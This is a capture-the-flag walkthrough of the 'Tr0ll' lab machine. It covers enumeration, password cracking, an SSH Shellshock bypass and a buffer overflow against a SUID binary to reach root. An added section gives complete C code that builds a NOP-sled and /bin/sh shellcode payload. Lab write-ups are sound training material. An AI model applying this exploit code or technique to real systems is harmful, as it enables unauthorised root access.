Initial Foothold

  1. Network discovery

My target is 10.0.2.30.

2. Port scan

3. OS and service scan

There are three services: FTP, SSH, and HTTP.

4. Vuln scan

There’s a ‘robots.txt’ file.

Service Enumeration

There are three TCP services:

  • 21/tcp ftp vsftpd 2.0.8 or later

Connect

There’s a banner.

  • 22/tcp ssh OpenSSH 5.9p1 Debian 5ubuntu1.4

Connect

  • 80/tcp http Apache httpd 2.2.22 ((Ubuntu))

  1. Nikto scan

2. Directory scan

3. Access the site

View page source. There’s a possible username: Tr0ll.

Save it as ‘user.txt’ in case I need to use it.

Access robots.txt

Copy only the directory list and save it as ‘robots_fix.txt’.

4. Enumerate the site’s directories with robots_fix.txt

Only four of the listed directories are accessible. The others are trolls.

I started with ‘ok_this_is_it’. It is a page with a single image.

View page source

Save the image and analyze its metadata

The file size is 15 KiB.

Search for any hidden messages.

I repeated the same steps for every path until I reached /dont_bother/.

Its image is 16 KiB, which differs from the others.

Run ‘strings’ on it to look for a hidden message, and there it is.

6. Access ‘y0ur_self’

There’s an ‘answer.txt’ file.

Read it. It is a list of base64-encoded strings, and many of the lines are duplicates.

Download it.

Remove the duplicate lines.

Now it is cleaner.

Decode it with CyberChef. It can import files, which makes this convenient. After decoding, I saved the output as ‘decoded_answer.txt’.

Read the file

It looks like a list of passwords for something.

Find a way onto the machine

I don’t have a shell yet. Two services take credentials: FTP and SSH.

So far I have one username, Tr0ll, and a list of passwords.

  1. Starting with FTP, connect to the service again.

Sometimes an FTP user doesn’t require a password.

Failed.

Use the username as the password as well. This time I succeeded.

There’s ‘lmao.zip’.

Download it

Unzip it.

It is password-protected.

Crack it with fcrackzip, using the password list I already have as the dictionary.

Now I have the password.

Inside is a new file, ‘noob’.

Read it.

It’s a private key for the SSH service.

2. Log in to the SSH service

Restrict the permissions on ‘noob’ (ssh refuses to use a key file that other users can read).

Starting with ‘Tr0ll’

It still asks for a password.

The key file is named ‘noob’, so the username may be ‘noob’. Change the username to ‘noob’.

The connection was closed immediately after logging in.

Try the Shellshock technique over SSH. A key that closes the session immediately is the classic setup: sshd exports the requested command in the SSH_ORIGINAL_COMMAND environment variable before running the forced command, and a Shellshock-vulnerable bash evaluates a function-definition string in that variable, so whatever follows the definition gets executed.

Now I have a shell, but I need a TTY to work comfortably on the machine.

Privilege Escalation

  1. Explore directories as listed:

I don't find anything in these directories.

2. Check sudo permissions

It asks for a password.

3. LinEnum.sh

Prepare HTTP server on the attacker machine

Download it

Run it

Reading from the bottom up, here are the interesting findings.

noob’s ‘.bash_history’: possibly a hint at a buffer overflow (BOF).

SUID files: the last three entries are the leads.

Go there.

There’re 3 directories.

door1

There’s r00t.

door2

There’s r00t.

door3

There’s r00t.

Try running it.

My connection is closed after a few seconds, and I have to reconnect.

Let’s try door2.

It expects an argument.

Maybe this is the buffer overflow.

Buffer Overflow

  1. Fuzzing

A long input produces a segmentation fault, so I can proceed to the next step.

2. Find EIP offset

Create a pattern of 500 characters

Open r00t with gdb

Supply the created pattern

EIP is overwritten with 0x6a413969

Find the offset

EIP offset is 268.

3. Find ESP address

Back in gdb

The ESP address is 0xbffffac0

4. Overwriting EIP and confirm the offset

Quit gdb and restart the program

After quitting, r00t has disappeared.

List the file.

Nothing

Try to run r00t in door3

Back to door2

Permission denied.

Now I think the machine runs a hidden script to troll me: it makes things harder, kills the connection, and makes the file disappear.

I can check this directory with a different command.

Now I get the same file back.

Open it with gdb

Confirm the offset

EIP is now 0x42424242 (“BBBB”), which confirms that the offset is correct.

5. Exploitation

I took the /bin/sh shellcode from here:

NOTE: “\x90” * 10 is a 10-byte NOP sled placed between the return address and the shellcode.
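The whole buffer-overflow procedure above, as an added C example that is not part of the original writeup: a cyclic-pattern generator and offset finder (what pattern_create/pattern_offset do), and a payload builder for the layout the NOTE describes, with the return address pointing at the ESP value seen at the crash so execution slides through the NOP sled into the shellcode. The EIP value 0x6a413969, the offset 268 and the ESP address 0xbffffac0 are the values from this writeup; the 23-byte execve /bin//sh shellcode is the common public one and is assumed to be equivalent to the linked one; the program name ‘gen’ and the 1024-byte scratch buffer are my own choices.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit-style cyclic pattern ("Aa0Aa1Aa2...Ab0..."): every 4-byte
 * window is unique, so the bytes that land in EIP identify the offset.
 * Writes at most len bytes plus a NUL into out and returns the length. */
static size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    out[n] = '\0';
    return n;
}

/* Recover the offset from the EIP value gdb reported. x86 is little-endian,
 * so 0x6a413969 was loaded from the bytes 69 39 41 6a = "i9Aj".
 * Returns -1 if the value does not come from the pattern. */
static long pattern_offset(uint32_t eip, size_t len)
{
    char *pat = malloc(len + 1);
    if (!pat)
        return -1;
    pattern_create(pat, len);
    char needle[5];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((eip >> (8 * i)) & 0xff);
    needle[4] = '\0';
    const char *hit = strstr(pat, needle);
    long off = hit ? (long)(hit - pat) : -1;
    free(pat);
    return off;
}

/* Linux x86 execve("/bin//sh") shellcode, 23 bytes, no NUL bytes. This is
 * the common public one; assumed equivalent to the one the writeup links. */
static const unsigned char SHELLCODE[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
enum { SHELLCODE_LEN = 23 };

/* Scratch buffer for the payload (my choice of size). */
static unsigned char g_payload[1024];

/* Layout: [offset x 'A'][ret, little-endian][nops x 0x90][shellcode].
 * When the vulnerable function returns, the overwritten EIP pops ret and
 * ESP then points just past it, i.e. at the NOP sled; that is why ret is
 * the ESP value seen at the crash. Returns the payload length, 0 if it
 * does not fit in cap. */
static size_t build_payload(unsigned char *out, size_t cap,
                            size_t offset, uint32_t ret, size_t nops)
{
    size_t need = offset + 4 + nops + SHELLCODE_LEN;
    if (need > cap)
        return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (unsigned char)((ret >> (8 * i)) & 0xff);
    memset(out + offset + 4, 0x90, nops);
    memcpy(out + offset + 4 + nops, SHELLCODE, SHELLCODE_LEN);
    return need;
}

int main(void)
{
    long off = pattern_offset(0x6a413969u, 500);   /* 268 for this crash */
    if (off < 0)
        return 1;
    fprintf(stderr, "EIP offset: %ld\n", off);
    size_t n = build_payload(g_payload, sizeof g_payload,
                             (size_t)off, 0xbffffac0u, 10);
    /* Raw bytes to stdout, so the target can be run as: ./r00t "$(./gen)" */
    fwrite(g_payload, 1, n, stdout);
    return n ? 0 : 1;
}
```

Neither the return address (c0 fa ff bf) nor the shellcode contains a NUL byte, so the payload survives being passed as a C string in argv. Stack addresses seen inside gdb can differ slightly from those outside it because the environment differs, so if the jump misses, widen the NOP sled and aim a little further into it.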

Now, I’m root.